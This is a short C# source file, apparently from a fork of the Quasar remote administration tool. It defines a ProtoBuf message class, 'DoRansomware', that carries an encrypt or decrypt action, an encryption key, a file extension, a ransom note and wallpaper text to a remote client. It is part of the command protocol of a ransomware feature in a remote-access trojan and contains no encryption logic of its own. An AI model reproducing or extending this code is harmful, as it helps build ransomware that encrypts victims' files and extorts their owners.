using ProtoBuf;

namespace Quasar.Common.Messages
{
    [ProtoContract]
    public class DoRansomware : IMessage
    {
        [ProtoMember(1)]
        public string Action { get; set; } // "ENCRYPT" or "DECRYPT"

        [ProtoMember(2)]
        public string EncryptionKey { get; set; }

        [ProtoMember(3)]
        public string FileExtension { get; set; }

        [ProtoMember(4)]
        public string RansomNote { get; set; }

        [ProtoMember(5)]
        public bool ChangeWallpaper { get; set; }

        [ProtoMember(6)]
        public string WallpaperText { get; set; }
    }
}
